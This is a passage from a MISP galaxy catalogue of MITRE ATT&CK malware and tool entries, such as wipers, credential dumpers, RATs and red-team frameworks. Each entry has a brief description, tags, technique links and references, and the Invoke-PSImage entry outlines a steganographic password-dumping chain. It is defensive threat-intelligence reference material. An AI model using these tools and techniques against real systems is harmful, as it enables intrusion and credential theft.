[Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021)

The tag is: misp-galaxy:mitre-malware="Meteor - S0688"

Meteor - S0688 is also known as:

  • Meteor

Table 7825. Table References

Links

https://attack.mitre.org/software/S0688

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

WhisperGate - S0689

[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)

The tag is: misp-galaxy:mitre-malware="WhisperGate - S0689"

WhisperGate - S0689 is also known as:

  • WhisperGate

Table 7826. Table References

Links

https://attack.mitre.org/software/S0689

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family

https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

HermeticWizard - S0698

[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)

The tag is: misp-galaxy:mitre-malware="HermeticWizard - S0698"

HermeticWizard - S0698 is also known as:

  • HermeticWizard

Table 7827. Table References

Links

https://attack.mitre.org/software/S0698

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine

mitre-tool

Name of ATT&CK software.

mitre-tool is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Windows Credential Editor - S0005

[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)

The tag is: misp-galaxy:mitre-tool="Windows Credential Editor - S0005"

Windows Credential Editor - S0005 is also known as:

  • Windows Credential Editor

  • WCE

Windows Credential Editor - S0005 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7828. Table References

Links

http://www.ampliasecurity.com/research/wcefaq.html

https://attack.mitre.org/software/S0005

Brute Ratel C4 - S1063

[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)

The tag is: misp-galaxy:mitre-tool="Brute Ratel C4 - S1063"

Brute Ratel C4 - S1063 is also known as:

  • Brute Ratel C4

  • BRc4

Table 7829. Table References

Links

https://attack.mitre.org/software/S1063

https://bruteratel.com/

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

Pass-The-Hash Toolkit - S0122

[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Pass-The-Hash Toolkit - S0122"

Pass-The-Hash Toolkit - S0122 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

Table 7830. Table References

Links

https://attack.mitre.org/software/S0122

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

CSPY Downloader - S0527

[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-tool="CSPY Downloader - S0527"

CSPY Downloader - S0527 is also known as:

  • CSPY Downloader

Table 7831. Table References

Links

https://attack.mitre.org/software/S0527

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Imminent Monitor - S0434

[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)

The tag is: misp-galaxy:mitre-tool="Imminent Monitor - S0434"

Imminent Monitor - S0434 is also known as:

  • Imminent Monitor

Table 7832. Table References

Links

https://attack.mitre.org/software/S0434

https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/

Invoke-PSImage - S0231

[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing the script either from a file or from the web. An example of its usage is embedding the PowerShell code from the Invoke-Mimikatz module into an image file. When the image file is called from a macro, for example, the macro downloads the picture and executes the embedded PowerShell code, which in this case dumps the passwords. (Citation: GitHub Invoke-PSImage)

The tag is: misp-galaxy:mitre-tool="Invoke-PSImage - S0231"

Invoke-PSImage - S0231 is also known as:

  • Invoke-PSImage

Invoke-PSImage - S0231 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7833. Table References

Links

https://attack.mitre.org/software/S0231

https://github.com/peewpw/Invoke-PSImage

ipconfig - S0100

[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system’s TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)

The tag is: misp-galaxy:mitre-tool="ipconfig - S0100"

ipconfig - S0100 is also known as:

  • ipconfig

ipconfig - S0100 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7834. Table References

Links

https://attack.mitre.org/software/S0100

https://technet.microsoft.com/en-us/library/bb490921.aspx

Mimikatz - S0002

[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)

The tag is: misp-galaxy:mitre-tool="Mimikatz - S0002"

Mimikatz - S0002 is also known as:

  • Mimikatz

Mimikatz - S0002 has relationships with:

  • similar: misp-galaxy:tool="Mimikatz" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7835. Table References

Links

https://adsecurity.org/?page_id=1821

https://attack.mitre.org/software/S0002

https://github.com/gentilkiwi/mimikatz

HTRAN - S0040

[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)

The tag is: misp-galaxy:mitre-tool="HTRAN - S0040"

HTRAN - S0040 is also known as:

  • HTRAN

  • HUC Packet Transmit Tool

HTRAN - S0040 has relationships with:

  • similar: misp-galaxy:malpedia="HTran" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 7836. Table References

Links

https://attack.mitre.org/software/S0040

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

MCMD - S0500

[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)

The tag is: misp-galaxy:mitre-tool="MCMD - S0500"

MCMD - S0500 is also known as:

  • MCMD

Table 7837. Table References

Links

https://attack.mitre.org/software/S0500

https://www.secureworks.com/research/mcmd-malware-analysis

pwdump - S0006

[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)

The tag is: misp-galaxy:mitre-tool="pwdump - S0006"

pwdump - S0006 is also known as:

  • pwdump

pwdump - S0006 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7838. Table References

Links

https://attack.mitre.org/software/S0006

https://en.wikipedia.org/wiki/Pwdump

gsecdump - S0008

[gsecdump](https://attack.mitre.org/software/S0008) is a publicly available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)

The tag is: misp-galaxy:mitre-tool="gsecdump - S0008"

gsecdump - S0008 is also known as:

  • gsecdump

gsecdump - S0008 has relationships with:

  • similar: misp-galaxy:malpedia="gsecdump" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7839. Table References

Links

https://attack.mitre.org/software/S0008

https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

at - S0110

[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)

The tag is: misp-galaxy:mitre-tool="at - S0110"

at - S0110 is also known as:

  • at

  • at.exe

at - S0110 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7840. Table References

Links

https://attack.mitre.org/software/S0110

https://man7.org/linux/man-pages/man1/at.1p.html

https://technet.microsoft.com/en-us/library/bb490866.aspx

ifconfig - S0101

[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)

The tag is: misp-galaxy:mitre-tool="ifconfig - S0101"

ifconfig - S0101 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7841. Table References

Links

https://attack.mitre.org/software/S0101

https://en.wikipedia.org/wiki/Ifconfig

Fgdump - S0120

[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Fgdump - S0120"

Fgdump - S0120 is also known as:

  • Fgdump

Fgdump - S0120 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7842. Table References

Links

https://attack.mitre.org/software/S0120

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

nbtstat - S0102

[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)

The tag is: misp-galaxy:mitre-tool="nbtstat - S0102"

nbtstat - S0102 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7843. Table References

Links

https://attack.mitre.org/software/S0102

https://technet.microsoft.com/en-us/library/cc940106.aspx

route - S0103

[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)

The tag is: misp-galaxy:mitre-tool="route - S0103"

route - S0103 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7844. Table References

Links

https://attack.mitre.org/software/S0103

https://technet.microsoft.com/en-us/library/bb490991.aspx

Rclone - S1040

[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)

The tag is: misp-galaxy:mitre-tool="Rclone - S1040"

Rclone - S1040 is also known as:

  • Rclone

Table 7845. Table References

Links

https://attack.mitre.org/software/S1040

https://rclone.org

https://redcanary.com/blog/rclone-mega-extortion/

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://unit42.paloaltonetworks.com/darkside-ransomware/

netstat - S0104

[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)

The tag is: misp-galaxy:mitre-tool="netstat - S0104"

netstat - S0104 is also known as:

  • netstat

netstat - S0104 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7846. Table References

Links

https://attack.mitre.org/software/S0104

https://technet.microsoft.com/en-us/library/bb490947.aspx

PcShare - S1050

[PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)

The tag is: misp-galaxy:mitre-tool="PcShare - S1050"

PcShare - S1050 is also known as:

  • PcShare

Table 7847. Table References

Links

https://attack.mitre.org/software/S1050

https://github.com/LiveMirror/pcshare

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

dsquery - S0105

[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: misp-galaxy:mitre-tool="dsquery - S0105"

dsquery - S0105 is also known as:

  • dsquery

  • dsquery.exe

dsquery - S0105 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 7848. Table References

Links

https://attack.mitre.org/software/S0105

https://technet.microsoft.com/en-us/library/cc732952.aspx

cmd - S0106

[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> (Citation: TechNet Dir)), deleting files (e.g., <code>del</code> (Citation: TechNet Del)), and copying files (e.g., <code>copy</code> (Citation: TechNet Copy)).

The tag is: misp-galaxy:mitre-tool="cmd - S0106"

cmd - S0106 is also known as:

  • cmd

  • cmd.exe

cmd - S0106 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7849. Table References

Links

https://attack.mitre.org/software/S0106

https://technet.microsoft.com/en-us/library/bb490880.aspx

https://technet.microsoft.com/en-us/library/bb490886.aspx

https://technet.microsoft.com/en-us/library/cc755121.aspx

https://technet.microsoft.com/en-us/library/cc771049.aspx

certutil - S0160

[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)

The tag is: misp-galaxy:mitre-tool="certutil - S0160"

certutil - S0160 is also known as:

  • certutil

  • certutil.exe

certutil - S0160 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7850. Table References

Links

https://attack.mitre.org/software/S0160

https://technet.microsoft.com/library/cc732443.aspx

netsh - S0108

[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)

The tag is: misp-galaxy:mitre-tool="netsh - S0108"

netsh - S0108 is also known as:

  • netsh

  • netsh.exe

netsh - S0108 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7851. Table References

Links

https://attack.mitre.org/software/S0108

https://technet.microsoft.com/library/bb490939.aspx

BITSAdmin - S0190

[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)

The tag is: misp-galaxy:mitre-tool="BITSAdmin - S0190"

BITSAdmin - S0190 is also known as:

  • BITSAdmin

BITSAdmin - S0190 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7852. Table References

Links

https://attack.mitre.org/software/S0190

https://msdn.microsoft.com/library/aa362813.aspx

Koadic - S0250

[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-tool="Koadic - S0250"

Koadic - S0250 is also known as:

  • Koadic

Table 7853. Table References

Links

https://attack.mitre.org/software/S0250

https://github.com/zerosum0x0/koadic

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

PsExec - S0029

[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)

The tag is: misp-galaxy:mitre-tool="PsExec - S0029"

PsExec - S0029 is also known as:

  • PsExec

PsExec - S0029 has relationships with:

  • similar: misp-galaxy:tool="PsExec" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7854. Table References

Links

https://attack.mitre.org/software/S0029

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/

Net - S0039

The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)

[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality (Citation: Savill 1999), much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

The tag is: misp-galaxy:mitre-tool="Net - S0039"

Net - S0039 is also known as:

  • Net

  • net.exe

Net - S0039 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 7855. Table References

Links

http://windowsitpro.com/windows/netexe-reference

https://attack.mitre.org/software/S0039

https://msdn.microsoft.com/en-us/library/aa939914

esentutl - S0404

[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)

The tag is: misp-galaxy:mitre-tool="esentutl - S0404"

esentutl - S0404 is also known as:

  • esentutl

  • esentutl.exe

Table 7856. Table References

Links

https://attack.mitre.org/software/S0404

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)

FlexiSpy - S0408

[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)

[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)

The tag is: misp-galaxy:mitre-tool="FlexiSpy - S0408"

FlexiSpy - S0408 is also known as:

  • FlexiSpy

Table 7857. Table References

Links

http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html

https://attack.mitre.org/software/S0408

https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf

https://www.flexispy.com/

Reg - S0075

[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)

Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)

The tag is: misp-galaxy:mitre-tool="Reg - S0075"

Reg - S0075 is also known as:

  • Reg

  • reg.exe

Reg - S0075 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

Table 7858. Table References

Links

https://attack.mitre.org/software/S0075

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/cc732643.aspx

Tasklist - S0057

The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)

The tag is: misp-galaxy:mitre-tool="Tasklist - S0057"

Tasklist - S0057 is also known as:

  • Tasklist

Tasklist - S0057 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7859. Table References

Links

https://attack.mitre.org/software/S0057

https://technet.microsoft.com/en-us/library/bb491010.aspx

ngrok - S0508

[ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-tool="ngrok - S0508"

ngrok - S0508 is also known as:

  • ngrok

Table 7860. Table References

Links

https://attack.mitre.org/software/S0508

https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/

NBTscan - S0590

[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)

The tag is: misp-galaxy:mitre-tool="NBTscan - S0590"

NBTscan - S0590 is also known as:

  • NBTscan

Table 7861. Table References

Links

https://attack.mitre.org/software/S0590

https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html

https://sectools.org/tool/nbtscan/

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments

ftp - S0095

[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)

The tag is: misp-galaxy:mitre-tool="ftp - S0095"

ftp - S0095 is also known as:

  • ftp

  • ftp.exe

ftp - S0095 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7862. Table References

Links

https://attack.mitre.org/software/S0095

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp

https://linux.die.net/man/1/ftp

Systeminfo - S0096

[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)

The tag is: misp-galaxy:mitre-tool="Systeminfo - S0096"

Systeminfo - S0096 is also known as:

  • Systeminfo

Systeminfo - S0096 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7863. Table References

Links

https://attack.mitre.org/software/S0096

https://technet.microsoft.com/en-us/library/bb491007.aspx

Ping - S0097

[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)

The tag is: misp-galaxy:mitre-tool="Ping - S0097"

Ping - S0097 is also known as:

  • Ping

Ping - S0097 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 7864. Table References

Links

https://attack.mitre.org/software/S0097

https://technet.microsoft.com/en-us/library/bb490968.aspx

Arp - S0099

[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system’s Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)

The tag is: misp-galaxy:mitre-tool="Arp - S0099"

Arp - S0099 is also known as:

  • Arp

  • arp.exe

Arp - S0099 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7865. Table References

Links

https://attack.mitre.org/software/S0099

https://technet.microsoft.com/en-us/library/bb490864.aspx

schtasks - S0111

[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)

The tag is: misp-galaxy:mitre-tool="schtasks - S0111"

schtasks - S0111 is also known as:

  • schtasks

  • schtasks.exe

schtasks - S0111 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7866. Table References

Links

https://attack.mitre.org/software/S0111

https://technet.microsoft.com/en-us/library/bb490996.aspx

Lslsass - S0121

[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Lslsass - S0121"

Lslsass - S0121 is also known as:

  • Lslsass

Lslsass - S0121 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7867. Table References

Links

https://attack.mitre.org/software/S0121

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

UACMe - S0116

[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)

The tag is: misp-galaxy:mitre-tool="UACMe - S0116"

UACMe - S0116 has relationships with:

  • similar: misp-galaxy:malpedia="UACMe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7868. Table References

Links

https://attack.mitre.org/software/S0116

https://github.com/hfiref0x/UACME

Rubeus - S1071

[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk’s Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)

The tag is: misp-galaxy:mitre-tool="Rubeus - S1071"

Rubeus - S1071 is also known as:

  • Rubeus

Table 7869. Table References

Links

https://attack.mitre.org/software/S1071

https://github.com/GhostPack/Rubeus

https://thedfirreport.com/2020/10/08/ryuks-return/

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Cachedump - S0119

[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Cachedump - S0119"

Cachedump - S0119 is also known as:

  • Cachedump

Cachedump - S0119 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7870. Table References

Links

https://attack.mitre.org/software/S0119

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Pacu - S1091

Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.(Citation: GitHub Pacu)

The tag is: misp-galaxy:mitre-tool="Pacu - S1091"

Pacu - S1091 is also known as:

  • Pacu

Table 7871. Table References

Links

